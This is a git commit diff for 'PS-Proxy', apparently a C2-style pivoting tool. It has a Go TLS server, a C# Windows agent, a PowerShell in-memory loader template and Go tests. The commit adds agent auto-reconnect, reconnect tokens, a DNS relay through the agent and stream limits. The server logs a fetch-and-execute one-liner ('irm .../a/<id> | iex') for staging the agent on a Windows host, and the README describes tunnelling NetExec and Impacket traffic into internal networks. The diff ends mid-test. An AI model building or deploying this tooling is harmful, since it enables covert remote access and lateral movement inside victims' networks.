Polish tunnel reliability edge cases

This commit is contained in:
Harrison-Wells-Cyber
2026-07-22 11:20:39 -07:00
parent ac6a1914a8
commit 639ecef10d
9 changed files with 575 additions and 68 deletions
+12 -3
View File
@@ -96,7 +96,10 @@ sudo ./psproxy-server \
--cert /etc/letsencrypt/live/c2.example.com/fullchain.pem \ --cert /etc/letsencrypt/live/c2.example.com/fullchain.pem \
--key /etc/letsencrypt/live/c2.example.com/privkey.pem \ --key /etc/letsencrypt/live/c2.example.com/privkey.pem \
--route 10.10.10.0/24 \ --route 10.10.10.0/24 \
--redirect --redirect \
--max-streams 256 \
--dns-listen 127.0.0.1:5353 \
--dns-target 10.10.10.10:53
``` ```
With `--redirect`, PS-Proxy creates an iptables NAT chain for each `--route` and With `--redirect`, PS-Proxy creates an iptables NAT chain for each `--route` and
@@ -140,7 +143,8 @@ ldapsearch -x -H ldap://127.0.0.1:1389 -D 'user@example.local' -W -b 'DC=example
Transparent redirect mode is the recommended test-environment workflow right now. Transparent redirect mode is the recommended test-environment workflow right now.
The fixed-target relay remains useful when you want a single local port mapped to The fixed-target relay remains useful when you want a single local port mapped to
a single target for debugging. a single target for debugging. Use `--max-streams` to cap concurrent proxied TCP
connections during high-concurrency tools such as NetExec; the default is 256. When `--dns-listen` and `--dns-target` are set together, the server exposes a UDP DNS listener and forwards raw DNS queries through the enrolled agent to the internal DNS server reachable from the agent host.
## Security notes ## Security notes
@@ -163,10 +167,14 @@ Implemented now:
- Go TLS listener with mixed HTTP staging and raw agent tunnel handling. - Go TLS listener with mixed HTTP staging and raw agent tunnel handling.
- Leaf certificate pin calculation for generated agent configuration. - Leaf certificate pin calculation for generated agent configuration.
- Short-lived one-time staging URLs. - Short-lived one-time staging URLs.
- One-time enrollment token validation for the raw tunnel. - One-time enrollment token validation for the raw tunnel plus reconnect-token authentication after first enrollment.
- Agent auto-reconnect with exponential backoff for transient tunnel failures.
- Framed multiplexed stream protocol. - Framed multiplexed stream protocol.
- Linux transparent TCP redirect mode for direct local-tool TCP connections to routed target IPs. - Linux transparent TCP redirect mode for direct local-tool TCP connections to routed target IPs.
- Fixed-target TCP relay mode for protocol validation. - Fixed-target TCP relay mode for protocol validation.
- Bounded concurrent stream handling with per-stream local write queues so one slow local TCP client cannot block the whole multiplexed agent session.
- Optional UDP DNS relay that forwards raw DNS queries through the agent to an internal DNS server.
- JSON `/status` endpoint for agent and stream visibility.
- C# agent stream relay that opens normal outbound `TcpClient` connections from - C# agent stream relay that opens normal outbound `TcpClient` connections from
the Windows host. the Windows host.
- PowerShell loader template that loads a compressed/base64 managed assembly from - PowerShell loader template that loads a compressed/base64 managed assembly from
@@ -190,5 +198,6 @@ matrix that includes:
- NetExec SMB/LDAP tests; - NetExec SMB/LDAP tests;
- Impacket SMB/LDAP/RPC tests; - Impacket SMB/LDAP/RPC tests;
- reconnect and stale route cleanup tests; - reconnect and stale route cleanup tests;
- DNS relay tests against an internal AD DNS server;
- malformed frame and enrollment fuzz tests; - malformed frame and enrollment fuzz tests;
- certificate pin mismatch tests. - certificate pin mismatch tests.
+77 -5
View File
@@ -14,38 +14,63 @@ namespace PSProxy.Agent
{ {
public sealed class Tunnel public sealed class Tunnel
{ {
private const byte FrameOpen = 1, FrameOpenOK = 2, FrameOpenFail = 3, FrameData = 4, FrameClose = 5, FramePing = 6, FramePong = 7; private const byte FrameOpen = 1, FrameOpenOK = 2, FrameOpenFail = 3, FrameData = 4, FrameClose = 5, FramePing = 6, FramePong = 7, FrameDNSQuery = 8, FrameDNSReply = 9;
private const int MaxPayload = 1 << 20; private const int MaxPayload = 1 << 20;
private readonly string server; private readonly string server;
private readonly int port; private readonly int port;
private readonly string certPin; private readonly string certPin;
private readonly string enrollToken; private readonly string enrollToken;
private readonly string reconnectToken;
private readonly string dnsTarget;
private readonly ConcurrentDictionary<ulong, StreamCtx> streams = new ConcurrentDictionary<ulong, StreamCtx>(); private readonly ConcurrentDictionary<ulong, StreamCtx> streams = new ConcurrentDictionary<ulong, StreamCtx>();
private readonly object sendLock = new object(); private readonly object sendLock = new object();
private SslStream tls; private SslStream tls;
private volatile bool stopping; private volatile bool stopping;
public Tunnel(string server, int port, string certPin, string enrollToken) public Tunnel(string server, int port, string certPin, string enrollToken, string reconnectToken, string dnsTarget)
{ {
this.server = server; this.server = server;
this.port = port; this.port = port;
this.certPin = NormalizeHex(certPin); this.certPin = NormalizeHex(certPin);
this.enrollToken = enrollToken; this.enrollToken = enrollToken;
this.reconnectToken = reconnectToken ?? "";
this.dnsTarget = dnsTarget ?? "";
if (this.certPin.Length != 64) throw new ArgumentException("CertPin must be a SHA-256 hex string"); if (this.certPin.Length != 64) throw new ArgumentException("CertPin must be a SHA-256 hex string");
if (String.IsNullOrWhiteSpace(enrollToken)) throw new ArgumentException("EnrollToken is required"); if (String.IsNullOrWhiteSpace(enrollToken)) throw new ArgumentException("EnrollToken is required");
} }
public void Run() public void Run()
{
int delayMs = 1000;
while (!stopping)
{
try
{
RunOnce();
delayMs = 1000;
}
catch (Exception ex)
{
Console.Error.WriteLine("[ps-proxy] tunnel error: {0}", ex.Message);
CloseAllStreams();
if (stopping) break;
Thread.Sleep(delayMs);
delayMs = Math.Min(delayMs * 2, 30000);
}
}
}
private void RunOnce()
{ {
Console.Error.WriteLine("[ps-proxy] connecting to {0}:{1}", server, port); Console.Error.WriteLine("[ps-proxy] connecting to {0}:{1}", server, port);
using (var tcp = new TcpClient()) using (var tcp = new TcpClient())
{ {
tcp.NoDelay = true; tcp.NoDelay = true;
tcp.Connect(server, port); ConnectWithTimeout(tcp, server, port, 15000);
using (tls = new SslStream(tcp.GetStream(), false, ValidateServerCertificate)) using (tls = new SslStream(tcp.GetStream(), false, ValidateServerCertificate))
{ {
tls.AuthenticateAsClient(server, null, SslProtocols.Tls12, false); tls.AuthenticateAsClient(server, null, SslProtocols.Tls12, false);
WriteAscii("PSP1\nENROLL " + enrollToken + "\n"); WriteAscii("PSP1\nENROLL " + enrollToken + " " + reconnectToken + "\n");
Frame hello = ReadFrame(); Frame hello = ReadFrame();
if (hello.Type != FramePong || Encoding.ASCII.GetString(hello.Payload) != "OK") throw new Exception("server did not accept enrollment"); if (hello.Type != FramePong || Encoding.ASCII.GetString(hello.Payload) != "OK") throw new Exception("server did not accept enrollment");
Console.Error.WriteLine("[ps-proxy] enrolled and ready"); Console.Error.WriteLine("[ps-proxy] enrolled and ready");
@@ -65,6 +90,7 @@ namespace PSProxy.Agent
case FrameData: HandleData(f.StreamID, f.Payload); break; case FrameData: HandleData(f.StreamID, f.Payload); break;
case FrameClose: CloseStream(f.StreamID, false); break; case FrameClose: CloseStream(f.StreamID, false); break;
case FramePing: SendFrame(new Frame(f.StreamID, FramePong, new byte[0])); break; case FramePing: SendFrame(new Frame(f.StreamID, FramePong, new byte[0])); break;
case FrameDNSQuery: StartDnsQuery(f.StreamID, f.Payload); break;
} }
} }
} }
@@ -76,7 +102,7 @@ namespace PSProxy.Agent
string host; int dstPort; SplitTarget(target, out host, out dstPort); string host; int dstPort; SplitTarget(target, out host, out dstPort);
var client = new TcpClient(); var client = new TcpClient();
client.NoDelay = true; client.NoDelay = true;
client.Connect(host, dstPort); ConnectWithTimeout(client, host, dstPort, 15000);
var ctx = new StreamCtx(sid, client); var ctx = new StreamCtx(sid, client);
if (!streams.TryAdd(sid, ctx)) { client.Close(); throw new Exception("duplicate stream"); } if (!streams.TryAdd(sid, ctx)) { client.Close(); throw new Exception("duplicate stream"); }
SendFrame(new Frame(sid, FrameOpenOK, new byte[0])); SendFrame(new Frame(sid, FrameOpenOK, new byte[0]));
@@ -98,6 +124,36 @@ namespace PSProxy.Agent
catch { CloseStream(sid, true); } catch { CloseStream(sid, true); }
} }
private void StartDnsQuery(ulong sid, byte[] payload)
{
var t = new Thread(delegate() { HandleDnsQuery(sid, payload); });
t.IsBackground = true;
t.Start();
}
private void HandleDnsQuery(ulong sid, byte[] payload)
{
try
{
if (String.IsNullOrWhiteSpace(dnsTarget)) throw new Exception("DNS target is not configured");
string host; int dstPort; SplitTarget(dnsTarget, out host, out dstPort);
using (var udp = new UdpClient())
{
udp.Client.ReceiveTimeout = 5000;
udp.Connect(host, dstPort);
udp.Send(payload, payload.Length);
IPEndPoint ep = null;
byte[] resp = udp.Receive(ref ep);
SendFrame(new Frame(sid, FrameDNSReply, resp));
}
}
catch (Exception ex)
{
Console.Error.WriteLine("[ps-proxy] DNS query failed: " + ex.Message);
SendFrame(new Frame(sid, FrameDNSReply, new byte[0]));
}
}
private void PumpTargetToServer(StreamCtx ctx) private void PumpTargetToServer(StreamCtx ctx)
{ {
byte[] buf = new byte[32768]; byte[] buf = new byte[32768];
@@ -126,6 +182,11 @@ namespace PSProxy.Agent
} }
} }
private void CloseAllStreams()
{
foreach (ulong sid in streams.Keys) CloseStream(sid, false);
}
private void SendFrame(Frame f) private void SendFrame(Frame f)
{ {
if (f.Payload == null) f.Payload = new byte[0]; if (f.Payload == null) f.Payload = new byte[0];
@@ -192,6 +253,17 @@ namespace PSProxy.Agent
if (dstPort < 1 || dstPort > 65535) throw new ArgumentException("invalid port"); if (dstPort < 1 || dstPort > 65535) throw new ArgumentException("invalid port");
} }
private static void ConnectWithTimeout(TcpClient client, string host, int dstPort, int timeoutMs)
{
IAsyncResult ar = client.BeginConnect(host, dstPort, null, null);
if (!ar.AsyncWaitHandle.WaitOne(timeoutMs))
{
try { client.Close(); } catch { }
throw new TimeoutException("connect timed out: " + host + ":" + dstPort);
}
client.EndConnect(ar);
}
private static string NormalizeHex(string s) { return (s ?? "").Trim().ToLowerInvariant().Replace(":", "").Replace(" ", ""); } private static string NormalizeHex(string s) { return (s ?? "").Trim().ToLowerInvariant().Replace(":", "").Replace(" ", ""); }
private static void WriteI32BE(byte[] b, int o, int v) { b[o] = (byte)(v >> 24); b[o + 1] = (byte)(v >> 16); b[o + 2] = (byte)(v >> 8); b[o + 3] = (byte)v; } private static void WriteI32BE(byte[] b, int o, int v) { b[o] = (byte)(v >> 24); b[o + 1] = (byte)(v >> 16); b[o + 2] = (byte)(v >> 8); b[o + 3] = (byte)v; }
private static int ReadI32BE(byte[] b, int o) { return ((int)b[o] << 24) | ((int)b[o + 1] << 16) | ((int)b[o + 2] << 8) | (int)b[o + 3]; } private static int ReadI32BE(byte[] b, int o) { return ((int)b[o] << 24) | ((int)b[o + 1] << 16) | ((int)b[o + 2] << 8) | (int)b[o + 3]; }
+7 -3
View File
@@ -4,6 +4,8 @@ param(
[int]$Port = {{.Port}}, [int]$Port = {{.Port}},
[string]$CertPin = "{{.CertPin}}", [string]$CertPin = "{{.CertPin}}",
[string]$EnrollToken = "{{.EnrollToken}}", [string]$EnrollToken = "{{.EnrollToken}}",
[string]$ReconnectToken = "{{.ReconnectToken}}",
[string]$DNSTarget = "{{.DNSTarget}}",
[switch]$NoAutoStart [switch]$NoAutoStart
) )
$ErrorActionPreference = "Stop" $ErrorActionPreference = "Stop"
@@ -29,10 +31,12 @@ function Start-PSTunnel {
[Parameter(Mandatory=$true)][string]$Server, [Parameter(Mandatory=$true)][string]$Server,
[int]$Port = 443, [int]$Port = 443,
[Parameter(Mandatory=$true)][string]$CertPin, [Parameter(Mandatory=$true)][string]$CertPin,
[Parameter(Mandatory=$true)][string]$EnrollToken [Parameter(Mandatory=$true)][string]$EnrollToken,
[string]$ReconnectToken = "",
[string]$DNSTarget = ""
) )
if (-not ("PSProxy.Agent.Tunnel" -as [type])) { Import-PSProxyAgentAssembly } if (-not ("PSProxy.Agent.Tunnel" -as [type])) { Import-PSProxyAgentAssembly }
$t = New-Object PSProxy.Agent.Tunnel -ArgumentList @($Server, $Port, $CertPin, $EnrollToken) $t = New-Object PSProxy.Agent.Tunnel -ArgumentList @($Server, $Port, $CertPin, $EnrollToken, $ReconnectToken, $DNSTarget)
$t.Run() $t.Run()
} }
if (-not $NoAutoStart) { Start-PSTunnel -Server $Server -Port $Port -CertPin $CertPin -EnrollToken $EnrollToken } if (-not $NoAutoStart) { Start-PSTunnel -Server $Server -Port $Port -CertPin $CertPin -EnrollToken $EnrollToken -ReconnectToken $ReconnectToken -DNSTarget $DNSTarget }
+259 -32
View File
@@ -5,6 +5,7 @@ import (
"crypto/sha256" "crypto/sha256"
"crypto/tls" "crypto/tls"
"encoding/hex" "encoding/hex"
"encoding/json"
"encoding/pem" "encoding/pem"
"errors" "errors"
"flag" "flag"
@@ -38,6 +39,9 @@ func main() {
agentAssemblyFile := flag.String("agent-assembly-b64-file", "", "file containing compressed/base64 PSProxy.Agent.dll; defaults to release/agent_assembly.b64 when present") agentAssemblyFile := flag.String("agent-assembly-b64-file", "", "file containing compressed/base64 PSProxy.Agent.dll; defaults to release/agent_assembly.b64 when present")
redirect := flag.Bool("redirect", false, "install Linux iptables REDIRECT rules for --route CIDRs and relay original destinations through the agent") redirect := flag.Bool("redirect", false, "install Linux iptables REDIRECT rules for --route CIDRs and relay original destinations through the agent")
redirectPort := flag.Int("redirect-port", 15080, "local transparent redirect listener port") redirectPort := flag.Int("redirect-port", 15080, "local transparent redirect listener port")
maxStreams := flag.Int("max-streams", 256, "maximum concurrent proxied TCP streams")
dnsListen := flag.String("dns-listen", "", "optional UDP DNS listener that forwards queries through the agent, e.g. 127.0.0.1:5353")
dnsTarget := flag.String("dns-target", "", "DNS server reachable by the agent for --dns-listen queries, e.g. 10.10.10.10:53")
tcpListen := flag.String("tcp-listen", "", "developer TCP relay listener, e.g. 127.0.0.1:1389") tcpListen := flag.String("tcp-listen", "", "developer TCP relay listener, e.g. 127.0.0.1:1389")
tcpTarget := flag.String("tcp-target", "", "developer TCP relay target opened by the agent, e.g. 10.10.10.219:389") tcpTarget := flag.String("tcp-target", "", "developer TCP relay target opened by the agent, e.g. 10.10.10.219:389")
routes := multiFlag{} routes := multiFlag{}
@@ -57,9 +61,15 @@ func main() {
if (*tcpListen == "") != (*tcpTarget == "") { if (*tcpListen == "") != (*tcpTarget == "") {
log.Fatal("--tcp-listen and --tcp-target must be supplied together") log.Fatal("--tcp-listen and --tcp-target must be supplied together")
} }
if (*dnsListen == "") != (*dnsTarget == "") {
log.Fatal("--dns-listen and --dns-target must be supplied together")
}
if *redirect && len(routes) == 0 { if *redirect && len(routes) == 0 {
log.Fatal("--redirect requires at least one --route CIDR") log.Fatal("--redirect requires at least one --route CIDR")
} }
if err := validateRoutes(routes); err != nil {
log.Fatal(err)
}
pin, err := certPin(*cert) pin, err := certPin(*cert)
if err != nil { if err != nil {
log.Fatalf("certificate pin failed: %v", err) log.Fatalf("certificate pin failed: %v", err)
@@ -73,14 +83,15 @@ func main() {
} }
tmpl := template.Must(template.ParseFiles(*agentTemplate)) tmpl := template.Must(template.ParseFiles(*agentTemplate))
store := staging.NewStore(*ttl) store := staging.NewStore(*ttl)
sess, err := store.Create(*domain, *port, pin) sess, err := store.Create(*domain, *port, pin, *dnsTarget)
if err != nil { if err != nil {
log.Fatal(err) log.Fatal(err)
} }
server := NewTunnelServer(store) server := NewTunnelServer(store, *maxStreams)
mux := http.NewServeMux() mux := http.NewServeMux()
mux.HandleFunc("GET /a/{id}", staging.AgentHandler(store, tmpl, assembly)) mux.HandleFunc("GET /a/{id}", staging.AgentHandler(store, tmpl, assembly))
mux.HandleFunc("GET /healthz", func(w http.ResponseWriter, r *http.Request) { _, _ = w.Write([]byte("ok\n")) }) mux.HandleFunc("GET /healthz", func(w http.ResponseWriter, r *http.Request) { _, _ = w.Write([]byte("ok\n")) })
mux.HandleFunc("GET /status", statusHandler(server))
var redirectCleanup func() var redirectCleanup func()
if *redirect { if *redirect {
redirectCleanup = setupRedirectOrFatal(routes, *redirectPort) redirectCleanup = setupRedirectOrFatal(routes, *redirectPort)
@@ -90,6 +101,9 @@ func main() {
if *tcpListen != "" { if *tcpListen != "" {
go serveTCPRelay(*tcpListen, *tcpTarget, server) go serveTCPRelay(*tcpListen, *tcpTarget, server)
} }
if *dnsListen != "" {
go serveDNSRelay(*dnsListen, server)
}
installSignalCleanup(redirectCleanup) installSignalCleanup(redirectCleanup)
addr := fmt.Sprintf("%s:%d", *listen, *port) addr := fmt.Sprintf("%s:%d", *listen, *port)
log.Printf("PS-Proxy Go server starting on https://%s", addr) log.Printf("PS-Proxy Go server starting on https://%s", addr)
@@ -102,18 +116,28 @@ func main() {
if *tcpListen != "" { if *tcpListen != "" {
log.Printf("Developer TCP relay: %s -> agent -> %s", *tcpListen, *tcpTarget) log.Printf("Developer TCP relay: %s -> agent -> %s", *tcpListen, *tcpTarget)
} }
if *dnsListen != "" {
log.Printf("DNS relay: %s -> agent -> %s", *dnsListen, *dnsTarget)
}
log.Printf("Run this on the Windows host: irm %s/a/%s | iex", publicURL(*domain, *port), sess.ID) log.Printf("Run this on the Windows host: irm %s/a/%s | iex", publicURL(*domain, *port), sess.ID)
log.Fatal(serveMixedTLS(addr, *cert, *key, mux, server)) log.Fatal(serveMixedTLS(addr, *cert, *key, mux, server))
} }
type TunnelServer struct { type TunnelServer struct {
store *staging.Store store *staging.Store
mu sync.Mutex mu sync.Mutex
session *AgentSession session *AgentSession
nextID atomic.Uint64 nextID atomic.Uint64
dnsID atomic.Uint64
maxStreams int
} }
func NewTunnelServer(store *staging.Store) *TunnelServer { return &TunnelServer{store: store} } func NewTunnelServer(store *staging.Store, maxStreams int) *TunnelServer {
if maxStreams < 1 {
maxStreams = 1
}
return &TunnelServer{store: store, maxStreams: maxStreams}
}
func (s *TunnelServer) SetSession(a *AgentSession) { func (s *TunnelServer) SetSession(a *AgentSession) {
s.mu.Lock() s.mu.Lock()
@@ -127,13 +151,23 @@ func (s *TunnelServer) SetSession(a *AgentSession) {
func (s *TunnelServer) Current() *AgentSession { s.mu.Lock(); defer s.mu.Unlock(); return s.session } func (s *TunnelServer) Current() *AgentSession { s.mu.Lock(); defer s.mu.Unlock(); return s.session }
func (s *TunnelServer) ClearSession(a *AgentSession) {
s.mu.Lock()
if s.session == a {
s.session = nil
}
s.mu.Unlock()
}
func (s *TunnelServer) OpenAttached(target string, local net.Conn) (*AgentSession, uint64, error) { func (s *TunnelServer) OpenAttached(target string, local net.Conn) (*AgentSession, uint64, error) {
a := s.Current() a := s.Current()
if a == nil { if a == nil {
return nil, 0, errors.New("no enrolled agent connected") return nil, 0, errors.New("no enrolled agent connected")
} }
id := s.nextID.Add(1) id := s.nextID.Add(1)
a.AttachLocal(id, local) if err := a.AttachLocal(id, local); err != nil {
return nil, 0, err
}
if err := a.Open(id, target); err != nil { if err := a.Open(id, target); err != nil {
a.RemoveLocal(id) a.RemoveLocal(id)
return nil, 0, err return nil, 0, err
@@ -142,21 +176,45 @@ func (s *TunnelServer) OpenAttached(target string, local net.Conn) (*AgentSessio
} }
type AgentSession struct { type AgentSession struct {
conn net.Conn conn net.Conn
br *bufio.Reader br *bufio.Reader
sendMu sync.Mutex sendMu sync.Mutex
closeOnce sync.Once closeOnce sync.Once
closed chan struct{} closed chan struct{}
mu sync.Mutex mu sync.Mutex
pending map[uint64]chan error pending map[uint64]chan error
locals map[uint64]net.Conn dnsPending map[uint64]chan []byte
locals map[uint64]*localStream
maxStreams int
} }
func NewAgentSession(c net.Conn, br *bufio.Reader) *AgentSession { func NewAgentSession(c net.Conn, br *bufio.Reader, maxStreams int) *AgentSession {
return &AgentSession{conn: c, br: br, closed: make(chan struct{}), pending: map[uint64]chan error{}, locals: map[uint64]net.Conn{}} if maxStreams < 1 {
maxStreams = 1
}
return &AgentSession{conn: c, br: br, closed: make(chan struct{}), pending: map[uint64]chan error{}, dnsPending: map[uint64]chan []byte{}, locals: map[uint64]*localStream{}, maxStreams: maxStreams}
} }
func (a *AgentSession) Close() { a.closeOnce.Do(func() { close(a.closed); _ = a.conn.Close() }) } func (a *AgentSession) Close() {
a.closeOnce.Do(func() {
close(a.closed)
_ = a.conn.Close()
a.mu.Lock()
for id, ch := range a.pending {
delete(a.pending, id)
ch <- errors.New("agent session closed")
}
for id, ch := range a.dnsPending {
delete(a.dnsPending, id)
close(ch)
}
for id, ls := range a.locals {
delete(a.locals, id)
ls.close()
}
a.mu.Unlock()
})
}
func (a *AgentSession) send(f protocol.Frame) error { func (a *AgentSession) send(f protocol.Frame) error {
a.sendMu.Lock() a.sendMu.Lock()
@@ -186,16 +244,29 @@ func (a *AgentSession) Open(id uint64, target string) error {
} }
} }
func (a *AgentSession) AttachLocal(id uint64, c net.Conn) { func (a *AgentSession) AttachLocal(id uint64, c net.Conn) error {
a.mu.Lock() a.mu.Lock()
a.locals[id] = c defer a.mu.Unlock()
a.mu.Unlock() select {
case <-a.closed:
return errors.New("agent session closed")
default:
}
if len(a.locals) >= a.maxStreams {
return fmt.Errorf("maximum concurrent streams reached: %d", a.maxStreams)
}
a.locals[id] = newLocalStream(c)
return nil
} }
func (a *AgentSession) RemoveLocal(id uint64) { func (a *AgentSession) RemoveLocal(id uint64) {
a.mu.Lock() a.mu.Lock()
ls := a.locals[id]
delete(a.locals, id) delete(a.locals, id)
a.mu.Unlock() a.mu.Unlock()
if ls != nil {
ls.close()
}
} }
func (a *AgentSession) Run() { func (a *AgentSession) Run() {
@@ -225,18 +296,21 @@ func (a *AgentSession) Run() {
} }
case protocol.FrameData: case protocol.FrameData:
a.mu.Lock() a.mu.Lock()
c := a.locals[f.StreamID] ls := a.locals[f.StreamID]
a.mu.Unlock() a.mu.Unlock()
if c != nil { if ls != nil && !ls.enqueue(f.Payload) {
_, _ = c.Write(f.Payload) a.RemoveLocal(f.StreamID)
_ = a.send(protocol.Frame{StreamID: f.StreamID, Type: protocol.FrameClose})
} }
case protocol.FrameClose: case protocol.FrameClose:
a.RemoveLocal(f.StreamID)
case protocol.FrameDNSReply:
a.mu.Lock() a.mu.Lock()
c := a.locals[f.StreamID] ch := a.dnsPending[f.StreamID]
delete(a.locals, f.StreamID) delete(a.dnsPending, f.StreamID)
a.mu.Unlock() a.mu.Unlock()
if c != nil { if ch != nil {
_ = c.Close() ch <- f.Payload
} }
case protocol.FramePing: case protocol.FramePing:
_ = a.send(protocol.Frame{StreamID: f.StreamID, Type: protocol.FramePong}) _ = a.send(protocol.Frame{StreamID: f.StreamID, Type: protocol.FramePong})
@@ -244,6 +318,140 @@ func (a *AgentSession) Run() {
} }
} }
type localStream struct {
conn net.Conn
ch chan []byte
done chan struct{}
once sync.Once
}
func newLocalStream(c net.Conn) *localStream {
ls := &localStream{conn: c, ch: make(chan []byte, 32), done: make(chan struct{})}
go ls.writeLoop()
return ls
}
func (l *localStream) enqueue(payload []byte) bool {
buf := append([]byte(nil), payload...)
select {
case l.ch <- buf:
return true
case <-l.done:
return false
default:
return false
}
}
func (l *localStream) writeLoop() {
defer l.close()
for {
select {
case payload := <-l.ch:
if _, err := l.conn.Write(payload); err != nil {
return
}
case <-l.done:
return
}
}
}
func (l *localStream) close() {
l.once.Do(func() {
close(l.done)
_ = l.conn.Close()
})
}
func (s *TunnelServer) Status() map[string]any {
a := s.Current()
status := map[string]any{"agent_connected": a != nil, "max_streams": s.maxStreams}
if a != nil {
a.mu.Lock()
status["active_streams"] = len(a.locals)
status["pending_opens"] = len(a.pending)
status["pending_dns"] = len(a.dnsPending)
a.mu.Unlock()
}
return status
}
func (s *TunnelServer) QueryDNS(query []byte) ([]byte, error) {
a := s.Current()
if a == nil {
return nil, errors.New("no enrolled agent connected")
}
id := s.dnsID.Add(1)
ch := make(chan []byte, 1)
a.mu.Lock()
select {
case <-a.closed:
a.mu.Unlock()
return nil, errors.New("agent session closed")
default:
}
a.dnsPending[id] = ch
a.mu.Unlock()
if err := a.send(protocol.Frame{StreamID: id, Type: protocol.FrameDNSQuery, Payload: query}); err != nil {
a.mu.Lock()
delete(a.dnsPending, id)
a.mu.Unlock()
return nil, err
}
select {
case resp, ok := <-ch:
if !ok {
return nil, errors.New("agent session closed")
}
if len(resp) == 0 {
return nil, errors.New("empty DNS response from agent")
}
return resp, nil
case <-time.After(5 * time.Second):
a.mu.Lock()
delete(a.dnsPending, id)
a.mu.Unlock()
return nil, errors.New("timeout waiting for DNS response")
}
}
func statusHandler(server *TunnelServer) http.HandlerFunc {
return func(w http.ResponseWriter, r *http.Request) {
w.Header().Set("Content-Type", "application/json")
_ = json.NewEncoder(w).Encode(server.Status())
}
}
func serveDNSRelay(listenAddr string, server *TunnelServer) {
addr, err := net.ResolveUDPAddr("udp", listenAddr)
if err != nil {
log.Fatalf("dns relay resolve failed: %v", err)
}
conn, err := net.ListenUDP("udp", addr)
if err != nil {
log.Fatalf("dns relay listen failed: %v", err)
}
log.Printf("dns relay listening on udp://%s", listenAddr)
buf := make([]byte, 4096)
for {
n, client, err := conn.ReadFromUDP(buf)
if err != nil {
log.Printf("dns relay read failed: %v", err)
continue
}
query := append([]byte(nil), buf[:n]...)
go func() {
resp, err := server.QueryDNS(query)
if err != nil {
log.Printf("dns relay query failed: %v", err)
return
}
_, _ = conn.WriteToUDP(resp, client)
}()
}
}
func serveTransparentRelay(listenAddr string, server *TunnelServer) { func serveTransparentRelay(listenAddr string, server *TunnelServer) {
ln, err := net.Listen("tcp4", listenAddr) ln, err := net.Listen("tcp4", listenAddr)
if err != nil { if err != nil {
@@ -299,6 +507,15 @@ func originalDst(c net.Conn) (string, error) {
return target, nil return target, nil
} }
func validateRoutes(routes []string) error {
for _, route := range routes {
if _, _, err := net.ParseCIDR(route); err != nil {
return fmt.Errorf("invalid --route CIDR %q: %w", route, err)
}
}
return nil
}
func setupRedirectOrFatal(routes []string, port int) func() { func setupRedirectOrFatal(routes []string, port int) func() {
if os.Geteuid() != 0 { if os.Geteuid() != 0 {
log.Fatal("--redirect requires root so iptables NAT rules can be installed") log.Fatal("--redirect requires root so iptables NAT rules can be installed")
@@ -434,16 +651,27 @@ func handleAgent(conn net.Conn, br *bufio.Reader, server *TunnelServer) {
_ = conn.Close() _ = conn.Close()
return return
} }
if err := server.store.Enroll(strings.TrimSpace(strings.TrimPrefix(line, prefix))); err != nil { fields := strings.Fields(strings.TrimPrefix(line, prefix))
if len(fields) == 0 {
_ = conn.Close()
return
}
enrollToken := fields[0]
reconnectToken := ""
if len(fields) > 1 {
reconnectToken = fields[1]
}
if err := server.store.Authenticate(enrollToken, reconnectToken); err != nil {
log.Printf("agent enrollment failed: %v", err) log.Printf("agent enrollment failed: %v", err)
_ = conn.Close() _ = conn.Close()
return return
} }
a := NewAgentSession(conn, br) a := NewAgentSession(conn, br, server.maxStreams)
server.SetSession(a) server.SetSession(a)
log.Printf("agent enrolled and connected from %s", conn.RemoteAddr()) log.Printf("agent enrolled and connected from %s", conn.RemoteAddr())
_ = a.send(protocol.Frame{Type: protocol.FramePong, Payload: []byte("OK")}) _ = a.send(protocol.Frame{Type: protocol.FramePong, Payload: []byte("OK")})
a.Run() a.Run()
server.ClearSession(a)
} }
type singleListener struct { type singleListener struct {
@@ -454,7 +682,6 @@ type singleListener struct {
func (s *singleListener) Accept() (net.Conn, error) { func (s *singleListener) Accept() (net.Conn, error) {
if s.conn == nil { if s.conn == nil {
<-s.done
return nil, io.EOF return nil, io.EOF
} }
c := s.conn c := s.conn
+126
View File
@@ -0,0 +1,126 @@
package main
import (
"bufio"
"net"
"testing"
"time"
"github.com/psproxy/psproxy/internal/protocol"
"github.com/psproxy/psproxy/internal/staging"
)
func TestTunnelServerMaxStreams(t *testing.T) {
server := NewTunnelServer(staging.NewStore(time.Minute), 1)
agent, peer := net.Pipe()
defer peer.Close()
sess := NewAgentSession(agent, bufio.NewReader(agent), server.maxStreams)
defer sess.Close()
server.SetSession(sess)
local1, remote1 := net.Pipe()
defer remote1.Close()
defer local1.Close()
if err := sess.AttachLocal(1, local1); err != nil {
t.Fatalf("first stream should attach: %v", err)
}
local2, remote2 := net.Pipe()
defer remote2.Close()
defer local2.Close()
if err := sess.AttachLocal(2, local2); err == nil {
t.Fatal("second stream should be rejected at max stream limit")
}
}
func TestLocalStreamBackpressureClosesConnection(t *testing.T) {
local, remote := net.Pipe()
defer remote.Close()
ls := newLocalStream(local)
defer ls.close()
failed := false
for i := 0; i < cap(ls.ch)+10; i++ {
if !ls.enqueue([]byte("x")) {
failed = true
break
}
}
if !failed {
t.Fatal("enqueue should eventually fail when the local write queue is full")
}
}
func TestTunnelServerQueryDNS(t *testing.T) {
server := NewTunnelServer(staging.NewStore(time.Minute), 2)
agent, peer := net.Pipe()
defer peer.Close()
sess := NewAgentSession(agent, bufio.NewReader(agent), server.maxStreams)
defer sess.Close()
server.SetSession(sess)
go sess.Run()
go func() {
f, err := protocol.ReadFrame(peer)
if err != nil {
return
}
_ = protocol.WriteFrame(peer, protocol.Frame{StreamID: f.StreamID, Type: protocol.FrameDNSReply, Payload: []byte("dns-response")})
}()
resp, err := server.QueryDNS([]byte("dns-query"))
if err != nil {
t.Fatalf("dns query failed: %v", err)
}
if string(resp) != "dns-response" {
t.Fatalf("unexpected dns response: %q", resp)
}
}
func TestValidateRoutes(t *testing.T) {
if err := validateRoutes([]string{"10.0.0.0/24", "192.168.1.10/32"}); err != nil {
t.Fatalf("valid routes rejected: %v", err)
}
if err := validateRoutes([]string{"not-a-cidr"}); err == nil {
t.Fatal("invalid CIDR should be rejected")
}
}
func TestTunnelServerQueryDNSEmptyResponseFails(t *testing.T) {
server := NewTunnelServer(staging.NewStore(time.Minute), 2)
agent, peer := net.Pipe()
defer peer.Close()
sess := NewAgentSession(agent, bufio.NewReader(agent), server.maxStreams)
defer sess.Close()
server.SetSession(sess)
go sess.Run()
go func() {
f, err := protocol.ReadFrame(peer)
if err != nil {
return
}
_ = protocol.WriteFrame(peer, protocol.Frame{StreamID: f.StreamID, Type: protocol.FrameDNSReply})
}()
if _, err := server.QueryDNS([]byte("dns-query")); err == nil {
t.Fatal("empty DNS replies should fail")
